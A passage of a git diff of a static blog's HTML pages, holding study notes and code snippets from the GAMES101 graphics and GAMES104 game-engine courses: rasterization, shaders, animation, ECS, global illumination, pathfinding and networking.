        if (point[0] > max_x) max_x = point[0];
        if (point[1] < min_y) min_y = point[1];
        if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
        for (int y = min_y; y <= max_y; ++y)
        {
            if (insideTriangle(x + 0.5, y + 0.5, t.v))
            {
                auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
                float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
                float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
                z_interpolated *= w_reciprocal;

                if (z_interpolated < depth_buf[get_index(x, y)])
                {
                    depth_buf[get_index(x, y)] = z_interpolated;
                    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
                    set_pixel(point, t.getColor());
                }
            }
        }
    }
}

static bool insideTriangle(): tests whether a point lies inside the triangle

    @@ -954,10 +952,10 @@

    HW2

This method relies on the sign behavior of the cross product: check the signs of the cross products to decide whether point P is inside the triangle. If all the cross products have the same sign, P lies on the same side of every edge, i.e. inside the triangle; if the signs differ, P lies outside.

Note that this method only applies when the point and the triangle lie in the same plane.

static bool insideTriangle(int x, int y, const Vector3f* _v)
{
    // TODO : Implement this function to check if the point (x, y) is inside the triangle represented by _v[0], _v[1], _v[2]
    Eigen::Vector3f AP(x - _v[0][0], y - _v[0][1], 0);
    Eigen::Vector3f BP(x - _v[1][0], y - _v[1][1], 0);
    Eigen::Vector3f CP(x - _v[2][0], y - _v[2][1], 0);
    Eigen::Vector3f AB(_v[1][0] - _v[0][0], _v[1][1] - _v[0][1], 0);
    Eigen::Vector3f BC(_v[2][0] - _v[1][0], _v[2][1] - _v[1][1], 0);
    Eigen::Vector3f CA(_v[0][0] - _v[2][0], _v[0][1] - _v[2][1], 0);
    return AB.cross(AP).z() * BC.cross(BP).z() >= 0 && BC.cross(BP).z() * CA.cross(CP).z() >= 0;
}

    $2\times2$ MSAA:

//Screen space rasterization
void rst::rasterizer::rasterize_triangle(const Triangle& t) {
    auto v = t.toVector4();

    // TODO : Find out the bounding box of current triangle.
    // iterate through the pixel and find if the current pixel is inside the triangle
    int min_x = INT_MAX;
    int max_x = INT_MIN;
    int min_y = INT_MAX;
    int max_y = INT_MIN;
    for (auto point : v) // bounding-box extents
    {
        if (point[0] < min_x) min_x = point[0];
        if (point[0] > max_x) max_x = point[0];
        if (point[1] < min_y) min_y = point[1];
        if (point[1] > max_y) max_y = point[1];
    }
    // If so, use the following code to get the interpolated z value.
    //auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
    //float w_reciprocal = 1.0/(alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
    //float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
    //z_interpolated *= w_reciprocal;

    // TODO : set the current pixel (use the set_pixel function) to the color of the triangle (use getColor function) if it should be painted.
    for (int x = min_x; x <= max_x; ++x)
    {
        for (int y = min_y; y <= max_y; ++y)
        {
            float rate = 0.0f;
            if (insideTriangle(x + 0.25, y + 0.25, t.v))
                rate += 0.25f;
            if (insideTriangle(x + 0.75, y + 0.75, t.v))
                rate += 0.25f;
            if (insideTriangle(x + 0.75, y + 0.25, t.v))
                rate += 0.25f;
            if (insideTriangle(x + 0.25, y + 0.75, t.v))
                rate += 0.25f;
            if (rate > 0.0f)
            {
                auto[alpha, beta, gamma] = computeBarycentric2D(x, y, t.v);
                float w_reciprocal = 1.0 / (alpha / v[0].w() + beta / v[1].w() + gamma / v[2].w());
                float z_interpolated = alpha * v[0].z() / v[0].w() + beta * v[1].z() / v[1].w() + gamma * v[2].z() / v[2].w();
                z_interpolated *= w_reciprocal;

                if (z_interpolated < depth_buf[get_index(x, y)])
                {
                    depth_buf[get_index(x, y)] = z_interpolated;
                    Eigen::Vector3f point = Eigen::Vector3f(x, y, z_interpolated);
                    set_pixel(point, rate * t.getColor());
                }
            }
        }
    }
}
    @@ -4900,6 +4898,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" index affa420ffb..9bde5bde69 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2103\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -479,7 +477,7 @@

    Visibi

    Z-Buffer Algorithm

Initialize the depth buffer to $\infty$.
During rasterization:

for (each triangle T)
    for (each sample (x,y,z) in T)
        if (z < zbuffer[x,y])        // closest sample so far: this triangle is nearer to the camera than what is stored
            framebuffer[x,y] = rgb;  // update color
            zbuffer[x,y] = z;        // update depth
        else
            ;                        // do nothing, this sample is occluded

    png

Example. Initially every value in the depth buffer is $R$ (infinity). The red triangle is rendered first, then the purple one; wherever the purple depth is smaller than the red, it overwrites the buffer.


    @@ -874,7 +872,7 @@

    Graphics pipelin

An operation that describes the color of a vertex or fragment

uniform sampler2D myTexture; // program parameter
uniform vec3 lightDir;       // program parameter
varying vec2 uv;             // per fragment value (interp. by rasterizer)
varying vec3 norm;           // per fragment value (interp. by rasterizer)

void diffuseShader()
{
    vec3 kd;                                     // diffuse coefficient (color)
    kd = texture2d(myTexture, uv);               // material color from texture, sampled at the UV coordinates
    kd *= clamp(dot(-lightDir, norm), 0.0, 1.0); // Lambertian shading model: scaling kd gives the diffuse term Ld
    gl_FragColor = vec4(kd, 1.0);                // output fragment color
}

    Shader function executes once per fragment.

The shader function executes once per fragment (so unlike plain C code you don't loop over everything yourself; the pipeline iterates for you).

      @@ -1041,7 +1039,7 @@

      Bary

      Texture queries

      Simple Texture Mapping: Diffuse Color


for each rasterized screen sample (x, y):          # usually a pixel center
    (u, v) = evaluate texture coordinate at (x, y) # using barycentric coordinates!
    texcolor = texture.sample(u, v);               # fetch the color at (u, v)
    set sample’s color to texcolor;                # usually the diffuse albedo Kd (recall the Blinn-Phong reflectance model)

      Texture Magnification - Easy Case

What do we do when the texture is too small?

      @@ -5168,6 +5166,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" index 1de853216f..b0e68a3749 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2104\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -5467,6 +5465,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" index 6b485f76cc..89e573b7be 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2105\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -1108,7 +1106,7 @@

      BVH Traversal

      png

Intersect(Ray ray, BVH node) {
    if (ray misses node.bbox) return;
    if (node is a leaf node)
        test intersection with all objs;
        return closest intersection;
    hit1 = Intersect(ray, node.child1);
    hit2 = Intersect(ray, node.child2);
    return the closer of hit1, hit2;
}

Recursively test for intersection.


      Spatial vs Object Partitions

      @@ -6056,6 +6054,8 @@

      目录

      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" index ec04d5e5a3..7a3fde90ed 100644 --- "a/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" +++ "b/posts/GAMES101-\347\216\260\344\273\243\350\256\241\347\256\227\346\234\272\345\233\276\345\275\242\345\255\246\345\205\245\351\227\250-\351\227\253\344\273\244\347\220\252\357\274\2106\357\274\211/index.html" @@ -44,8 +44,6 @@ - - @@ -721,7 +719,7 @@

      Measuring BRDFs

      Measuring BRDFs

General approach:

foreach outgoing direction wo
    move light to illuminate surface with a thin beam from wo
    for each incoming direction wi
        move sensor to be at direction wi from surface
        measure incident radiance

Improving efficiency:

diff --git a/posts/GAMES104-Animation/index.html b/posts/GAMES104-Animation/index.html

struct Joint {
    const String m_joint_name;               // the name of the joint
    UInt8 m_parent_joint_index;              // the index of the parent joint, or 0xFF if root
    Translation m_bind_pose_translation;     // bind pose: translation
    Rotation m_bind_pose_rotation;           // bind pose: rotation
    Matrix4x3 m_inverse_bind_pose_transform; // inverse bind pose; could be computed on demand, but is precomputed to save time
};

struct Skeleton {
    UInt m_joint_count; // number of joints
    Joint m_joints[];   // array of joints
};

Skinning Matrix Palette

An array of skinning matrices, one per joint.
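A minimal sketch of how such a palette could be built, assuming Matrix4x3 supports multiplication and the joint world transforms have already been evaluated from the current pose; the function and parameter names are illustrative, not from the lecture:

void buildSkinningMatrixPalette(const Skeleton& skeleton,
                                const Matrix4x3* jointWorldTransforms, // current pose, model space
                                Matrix4x3* outPalette) {
    for (UInt i = 0; i < skeleton.m_joint_count; ++i) {
        // skinning matrix = current world transform * inverse bind pose:
        // it moves a vertex from the bind pose into the current pose.
        outPalette[i] = jointWorldTransforms[i]
                      * skeleton.m_joints[i].m_inverse_bind_pose_transform;
    }
}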


Remove those frames which can be fitted by linear interpolation of adjacent frames.

KeyFrame = {}
for i = 1 to n-1 do
    frame_interp = Lerp(frame[i-1], frame[i+1])
    error = Diff(frame[i], frame_interp)
    if isNotAcceptable(error) then
        KeyFrame.insert(frame[i])
    end
end

Catmull-Rom Spline (lossy compression)
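A minimal sketch of Catmull-Rom evaluation between keys p1 and p2, with p0 and p3 as the neighboring keys and t in [0, 1]; frames dropped by the key-frame extraction above can be reconstructed this way at playback time:

float catmullRom(float p0, float p1, float p2, float p3, float t) {
    float t2 = t * t, t3 = t2 * t;
    // standard Catmull-Rom basis with tension 0.5
    return 0.5f * ((2.0f * p1)
                 + (-p0 + p2) * t
                 + (2.0f * p0 - 5.0f * p1 + 4.0f * p2 - p3) * t2
                 + (-p0 + 3.0f * p1 - 3.0f * p2 + p3) * t3);
}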


        ASM Definition

class ActionStateMachineClipNode
{
    AnimationClip m_clip;
    bool m_is_loop;
};

class ActionStateMachineBlendSpaceNode
{
    BlendSpace m_blend_space;
    bool m_is_loop;
};
    • Transition type

diff --git a/posts/GAMES104-Basic Elements/index.html b/posts/GAMES104-Basic Elements/index.html

      Game Object

Define each property as a variable and each behavior as a function.

class Drone
{
public:
    /* Properties */
    Vector3 position;
    float health;
    float fuel;
    ...
    /* Behavior */
    void move();
    void scout();
    ...
};

      Drone vs. Armed Drone

Now suppose we want to design an armed drone: compared with the ordinary drone it adds an ammo property and a fire behavior, as sketched below.
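A minimal sketch of the inheritance approach the slide implies — ArmedDrone extends Drone with the extra property and behavior:

class ArmedDrone : public Drone
{
public:
    /* Properties */
    float ammo;   // the ammunition the ordinary Drone lacks
    /* Behavior */
    void fire();  // the extra behavior
};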

diff --git a/posts/GAMES104-Data-Oriented Programming and Job System/index.html b/posts/GAMES104-Data-Oriented Programming and Job System/index.html

while (job_count < 100) {
    doSomething();
    job_count++;
}
      • Read job_count


Stackful Coroutine

• Example code:

#include <iostream>
#include <thread>

void worker() {
    for (int i = 0; i < 10; ++i) {
        std::cout << "Working...\n";
        std::this_thread::yield(); // yield the thread's execution slot
    }
}

int main() {
    std::thread t(worker);
    t.join();
    return 0;
}


To find the logic where the player attacks an enemy, you may have to dig through several layers of the inheritance tree.

Problems of OOP: Messy Base Class

class ENGINE_API AActor : public UObject
{
    ...
    const FTransform& GetTransform() const;
    const FTransform& ActorToWorld() const;
    FVector GetActorForwardVector() const;
    FVector GetActorUpVector() const;
    FVector GetActorRightVector() const;
    virtual void GetActorBounds(...) const;
    virtual FVector GetVelocity() const;
    float GetDistanceTo(const AActor* OtherActor) const;
    virtual void SetActorHiddenInGame(bool bNewHidden);
    bool GetActorEnableCollision() const;
    bool HasAuthority() const;
    UActorComponent* AddComponent(...);
    void AttachToActor(...);
    void DetachFromActor(const FDetachmentTransformRules& DetachmentRules);
    bool GetTickableWhenPaused();
    bool IsActorInitialized() const;
    void ReceiveAnyDamage(...);
    void GetOverlappingActors(...) const;
    virtual void SetLifeSpan(float InLifespan);
    virtual void Serialize(FArchive& Ar) override;
    virtual void PostLoad() override;
    ...
}

Part of the methods of a "messy base class" (poor readability).

Find some methods in common? Put them in the base class! → We get a messy base class.


class Player:
    def __init__(self, x, y):
        self.x = x
        self.y = y

    def move(self, dx, dy):
        self.x += dx
        self.y += dy

In data-oriented programming (DOP), by contrast, the entity's attributes are stored separately and standalone functions operate on them:

# store every player's position in one list
player_positions = [(0, 0), (5, 5), (10, 10)]

def move_player(index, dx, dy):
    x, y = player_positions[index]
    player_positions[index] = (x + dx, y + dy)

# move the first player
move_player(0, 1, 1)

In this example, the player_positions list stores every player's position, and move_player operates on that data directly with no object methods involved. This can improve performance, especially with large amounts of data, because it reduces per-object overhead and makes batch operations and parallel processing easier.

      Instructions are Data Too

Branch prediction

Avoid branch mispredictions.

int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
for (int i = 0; i < 10; i++)
{
    if (a[i] > 10)
    {
        doFunc1();
    }
    else
    {
        doFunc2();
    }
}

When execution keeps jumping between branches like this, cache misses become frequent and the code slows down.

int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
for (int i = 0; i < 10; i++)
{
    if (a[i] > 10)
    {
        doFunc1();
    }
    else
    {
        doFunc2();
    }
}

If the sequence is sorted in advance, execution no longer jumps around.

Existential Processing

for actor in actor_array do
    if actor is alive then
        aliveFunc(actor)
    else
        deadFunc(actor)
    end
end

This code also faces branch-prediction problems.

Unlike the example before, actor_array changes every tick.

for actor in alive_actor_array do
    aliveFunc(actor)
end

for actor in dead_actor_array do
    deadFunc(actor)
end

Completely avoid "if-else".

By maintaining two lists of different actors, we avoid branch misprediction; a sketch of the bookkeeping follows.
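A minimal sketch of maintaining the two lists: when an actor dies, move it from the alive list to the dead list with swap-and-pop so each loop stays branch-free. Actor and the two vectors are illustrative names, not from the lecture:

#include <vector>

struct Actor { /* ... */ };

void kill(std::vector<Actor>& alive, std::vector<Actor>& dead, size_t i) {
    dead.push_back(alive[i]);   // record it in the dead list
    alive[i] = alive.back();    // swap-and-pop keeps the alive array packed
    alive.pop_back();
}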


Unity ECS – System

public class MoveSystem : SystemBase
{
    protected override void OnUpdate()
    {
        // For each entity which has Translation and Velocity
        Entities.ForEach(
            // Write to Translation (ref), read Velocity (in)
            (ref Translation trans, in Velocity velocity) =>
            {
                // Execute for each selected entity
                trans = new Translation()
                {
                    // dT is a captured variable
                    Value = trans.Value + velocity.Value * dT
                };
            }
        ).ScheduleParallel(); // Schedule as a parallel job
    }
}

Unity C# Job System

Make it easier for users to write correct multithreaded code.

Unity C# Job System – Dependencies

A job may depend on other jobs completing before it runs.

public struct FirstJob : IJob
{
    public void Execute()
    {
        ...
    }
}

public struct SecondJob : IJob
{
    public void Execute()
    {
        ...
    }
}
var first_job = new FirstJob();
var second_job = new SecondJob();

// execute first_job
var first_job_handle = first_job.Schedule();

// second_job depends on first_job to complete
second_job.Schedule(first_job_handle);

Unity C# Job System – Native Container


// Allocate one float with "TempJob" policy
// Allocator.Temp: fastest allocation, lifespan is 1 frame or fewer
// Allocator.TempJob: slower than Temp, lifespan is 4 frames
// Allocator.Persistent: slowest allocation, can last as long as needed
NativeArray<float> a = new NativeArray<float>(1, Allocator.TempJob);
...
// Need to dispose manually for unmanaged memory
a.Dispose();

Unity C# Job System – Safety System

Supports safety checks (out-of-bounds checks, deallocation checks, race-condition checks) for jobs.


public struct Job : IJob
{
    public float a;
    public float b;
    public void Execute()
    {
        ...
    }
}

High-Performance C# and Burst Compiler


MassEntity – Entity
struct FMassEntityHandle
{
    ...
    int32 Index = 0;
    int32 SerialNumber = 0;
    ...
}
struct MASSENTITY_API FMassEntityManager
{
    ...
    TChunkedArray<FEntityData> Entities;
    TArray<int32> EntityFreeIndexList;
    ...
}

MassEntity – Component

Tags are constant boolean components used to filter out unnecessary processing.

struct FMassArchetypeCompositionDescriptor
{
    ...
    FMassFragmentBitSet Fragments;
    FMassTagBitSet Tags;
    FMassChunkFragmentBitSet ChunkFragments;
    FMassSharedFragmentBitSet SharedFragments;
}

MassEntity – Systems

MassEntity – Processor

Two important interfaces: ConfigureQueries() and Execute(...).

class MASSENTITY_API UMassProcessor : public UObject
{
    ...
protected:
    virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
    virtual void PostInitProperties() override;
    virtual void Execute(
        FMassEntityManager& EntityManager,
        FMassExecutionContext& Context) PURE_VIRTUAL(UMassProcessor::Execute);
    ...
}

MassEntity – Fragment Query


void UMassApplyMovementProcessor::ConfigureQueries()
{
    EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
    EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
    EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
}

MassEntity – Execute

diff --git a/posts/GAMES104-Dynamic Global Illumination and Lumen/index.html b/posts/GAMES104-Dynamic Global Illumination and Lumen/index.html

Hierarchical Z-Buffer Tracing

level = 0;
while (level > -1)
{
    stepCurrentCell();
    if (above z plane) level++;
    if (below z plane) level--;
}


Ray Reuse among Neighbor Pixels

Mesh card – an orthogonal camera on 6 axis-aligned directions

class FLumenCard
{
    FLumenCardOBB LocalOBB;
    FLumenCardOBB WorldOBB;
    uint8 AxisAlignedDirectionIndex;
}


    Generate Surface Cache

Compress from 320 MB to 88 MB.

static FLumenSurfaceLayerConfig Configs[(uint32)ELumenSurfaceCacheLayer::MAX]
{
    {TEXT("Depth"),    PF_G16,            PF_Unknown, PF_Unknown,           FVector(1.0f, 0.0f, 0.0f)},
    {TEXT("Albedo"),   PF_R8G8B8A8,       PF_BC7,     PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)},
    {TEXT("Opacity"),  PF_G8,             PF_BC4,     PF_R32G32B32A32_UINT, FVector(1.0f, 0.0f, 0.0f)},
    {TEXT("Normal"),   PF_R8G8,           PF_BC5,     PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)},
    {TEXT("Emissive"), PF_FloatR11G11B10, PF_BC6H,    PF_R32G32B32A32_UINT, FVector(0.0f, 0.0f, 0.0f)}
};

View-Dependent Per-Object Card Resolution

    128 x 128 physical pages in a 4096 x 4096 atlas

Screen Space Probes

Octahedron mapping

float2 UnitVectorToOctahedron(float3 N)
{
    N.xy /= dot(1, abs(N));
    if (N.z <= 0)
    {
        float x_factor = N.x >= 0 ? 1.0 : -1.0;
        float y_factor = N.y >= 0 ? 1.0 : -1.0;
        N.xy = (1 - abs(N.yx)) * float2(x_factor, y_factor);
    }
    return float2(N.xy);
}

Screen Probe Placement

Detect Non-Interpolatable Cases

float4 PlaneDistances;
PlaneDistances.x = abs(dot(float4(Position00, -1), ScenePlane));
PlaneDistances.y = abs(dot(float4(Position10, -1), ScenePlane));
PlaneDistances.z = abs(dot(float4(Position01, -1), ScenePlane));
PlaneDistances.w = abs(dot(float4(Position11, -1), ScenePlane));

float4 RelativeDepthDifference = PlaneDistances / SceneDepth;

float4 DepthWeights = CornerDepths > 0 ? exp2(-10000.0f * (RelativeDepthDifference * RelativeDepthDifference)) : 0;

InterpolationWeights = float4(
    (1 - BilinearWeights.y) * (1 - BilinearWeights.x),
    (1 - BilinearWeights.y) * BilinearWeights.x,
    BilinearWeights.y * (1 - BilinearWeights.x),
    BilinearWeights.y * BilinearWeights.x);
InterpolationWeights *= DepthWeights;

float Epsilon = .01f;
ScreenProbeSample.Weights /= max(dot(ScreenProbeSample.Weights, 1), Epsilon);
float LightingIsValid = (dot(ScreenProbeSample.Weights, 1) < 1.0f - Epsilon) ? 0.0f : 1.0f;

Screen Probe Atlas


float GetFilterPositionWeight(float ProbeDepth, float SceneDepth)
{
    float DepthDifference = abs(ProbeDepth - SceneDepth);
    float RelativeDepthDifference = DepthDifference / SceneDepth;
    return ProbeDepth >= 0 ? exp2(-SpatialFilterPositionWeightScale * (RelativeDepthDifference * RelativeDepthDifference)) : 0;
}

Denoise: Gather Radiance from Neighbors

        Gather radiance from matching Octahedral cell in neighbor probes

diff --git a/posts/GAMES104-GPU-Driven Geometry Pipeline-Nanite/index.html b/posts/GAMES104-GPU-Driven Geometry Pipeline-Nanite/index.html

void UnpackMaterialResolve(
    uint Packed,
    out bool IsNanitePixel,
    out bool IsDecalReceiver,
    out uint MaterialSlot)
{
    IsNanitePixel   = BitFieldExtractU32(Packed, 1, 0) != 0;
    MaterialSlot    = BitFieldExtractU32(Packed, 14, 1);
    IsDecalReceiver = BitFieldExtractU32(Packed, 1, 15) != 0;
}

Shadows

Micropoly Level of Detail for Shadows

diff --git a/posts/GAMES104-Gameplay/index.html b/posts/GAMES104-Gameplay/index.html

Scripting Language

The sandbox runs stably, with few crashes.

function tick(delta)
    if input_system.isKeyDown(Keycode.W) then
        self:moveForward(delta)
    elseif input_system.isKeyDown(Keycode.S) then
        self:moveBackward(delta)
    end

    if input_system.isKeyDown(Keycode.MouseLeft) then
        self:fire(delta)
    end
    ...
end
      Lua Script Example

How Script Languages Work


      Dijkstra Algorithm

for each vertex v:
    dist[v] = ∞
    prev[v] = none
dist[source] = 0
set all vertices to unexplored
while destination not explored:
    v = least-valued unexplored vertex
    set v to explored
    for each edge (v, w):
        if dist[v] + len(v, w) < dist[w]:
            dist[w] = dist[v] + len(v, w)
            prev[w] = v

It always finds the shortest path between two points in the graph; a concrete C++ version of the pseudocode is sketched below.
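A minimal sketch of the pseudocode above using std::priority_queue; the graph is assumed to be an adjacency list of (neighbor, edge length) pairs:

#include <limits>
#include <queue>
#include <utility>
#include <vector>

std::vector<float> dijkstra(
    const std::vector<std::vector<std::pair<int, float>>>& adj, int source) {
    std::vector<float> dist(adj.size(), std::numeric_limits<float>::infinity());
    using Item = std::pair<float, int>;  // (distance, vertex)
    std::priority_queue<Item, std::vector<Item>, std::greater<Item>> pq;
    dist[source] = 0.0f;
    pq.push({0.0f, source});
    while (!pq.empty()) {
        auto [d, v] = pq.top(); pq.pop();
        if (d > dist[v]) continue;       // stale queue entry, vertex already settled
        for (auto [w, len] : adj[v])
            if (dist[v] + len < dist[w]) {
                dist[w] = dist[v] + len; // relax the edge (v, w)
                pq.push({dist[w], w});
            }
    }
    return dist;
}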

      A Star (A*)

diff --git a/posts/GAMES104-Online Gaming Architecture/index.html b/posts/GAMES104-Online Gaming Architecture/index.html

Socket

A socket is the combination of an IP address and a port number.

// server side
struct sockaddr_in saddr, caddr;
int sockfd, clen, isock;
unsigned short port = 80;

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
    printf("Error creating socket\n");
    ...
}

memset(&saddr, '\0', sizeof(saddr));        // zero structure out
saddr.sin_family = AF_INET;                 // match the socket() call
saddr.sin_addr.s_addr = htonl(INADDR_ANY);  // bind to any local address
saddr.sin_port = htons(port);               // specify port to listen on

if (bind(sockfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0) { // bind
    printf("Error binding\n");
    ...
}

if (listen(sockfd, 5) < 0) {                // listen for incoming connections
    printf("Error listening\n");
    ...
}

clen = sizeof(caddr);
if ((isock = accept(sockfd, (struct sockaddr *)&caddr, &clen)) < 0) { // accept one
    printf("Error accepting\n");
    ...
}

Setup Socket

Both the client and the server need to set up the socket; the server side is listed above, and a client-side sketch follows.
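A minimal sketch of the matching client side, under the same POSIX socket API as the server listing (error handling trimmed); the function name is illustrative:

#include <arpa/inet.h>
#include <cstring>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

int connect_to_server(const char* ip, unsigned short port) {
    int sockfd = socket(AF_INET, SOCK_STREAM, 0);   // same socket() call as the server
    sockaddr_in saddr;
    std::memset(&saddr, 0, sizeof(saddr));
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(port);
    inet_pton(AF_INET, ip, &saddr.sin_addr);        // server address to connect to
    if (connect(sockfd, (sockaddr*)&saddr, sizeof(saddr)) < 0) {
        close(sockfd);
        return -1;
    }
    return sockfd;                                  // connected socket, ready for read/write
}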

Communication Way

Messages are not a natural programming pattern.

struct foomsg {
    uint32_t len;
};

void send_foo(char *contents) {
    int msglen = sizeof(struct foomsg) + strlen(contents);
    char *buf = malloc(msglen);
    struct foomsg *fm = (struct foomsg *)buf;
    fm->len = htonl(strlen(contents));
    memcpy(buf + sizeof(struct foomsg), contents, strlen(contents));
    write(outsock, buf, msglen);
}
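The sender above writes a length prefix followed by the payload; a minimal sketch of the matching receive side, which must loop because TCP may deliver a message in pieces. The function names are illustrative:

#include <arpa/inet.h>
#include <cstddef>
#include <cstdint>
#include <unistd.h>

// Read exactly n bytes, looping over short reads; returns false on EOF/error.
bool read_full(int sock, char* buf, size_t n) {
    size_t got = 0;
    while (got < n) {
        ssize_t r = read(sock, buf + got, n - got);
        if (r <= 0) return false;
        got += (size_t)r;
    }
    return true;
}

bool recv_foo(int sock, char* contents, size_t cap) {
    uint32_t len_net;
    if (!read_full(sock, (char*)&len_net, sizeof(len_net))) return false;
    uint32_t len = ntohl(len_net);          // undo the sender's htonl()
    if (len >= cap) return false;           // guard the caller's buffer
    if (!read_full(sock, contents, len)) return false;
    contents[len] = '\0';
    return true;
}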

More Challenges on Logic Communication


// polyline.proto
syntax = "proto2";

message Point {
    required int32 x = 1;
    required int32 y = 2;
    optional string label = 3;
}

message Line {
    required Point start = 1;
    required Point end = 2;
    optional string label = 3;
}

message Polyline {
    repeated Point point = 1;
    optional string label = 2;
}

        RPC Stubs


          Random Number


#include <iostream>
#include <random>

int main() {
    std::default_random_engine e;
    std::uniform_int_distribution<int> u(0, 100);
    e.seed(80);

    for (int i = 0; i < 20; i++) {
        std::cout << u(e) << std::endl;
    }

    return 0;
}
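A minimal sketch of why this matters for lockstep networking: assuming both sides run the same standard-library implementation, the same engine and the same seed produce the identical sequence, so client and server can roll the same "random" results without sending them:

#include <cassert>
#include <random>

void same_seed_same_sequence() {
    std::default_random_engine client(80), server(80);
    std::uniform_int_distribution<int> u(0, 100);
    for (int i = 0; i < 20; i++)
        assert(u(client) == u(server));  // never fires: the two streams match
}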

Deterministic Solution

Quick Catch Up

If the simulation normally runs at 10 logic frames per second, it may run at up to 100 frames per second while catching up.

float m_delta = 0;
float m_tick_delta = 100;
void CBattleLayer::update(float delta) {
    // do something
    m_delta += delta;
    int exec_count = 1;
    while (m_delta >= m_tick_delta) {
        m_delta -= m_tick_delta;
        // logic frame
        if (!logicUpdate(LOGIC_TIME)) {
            return;
        }
        // catch up 10 frames at a time
        if (exec_count++ >= 10) {
            break;
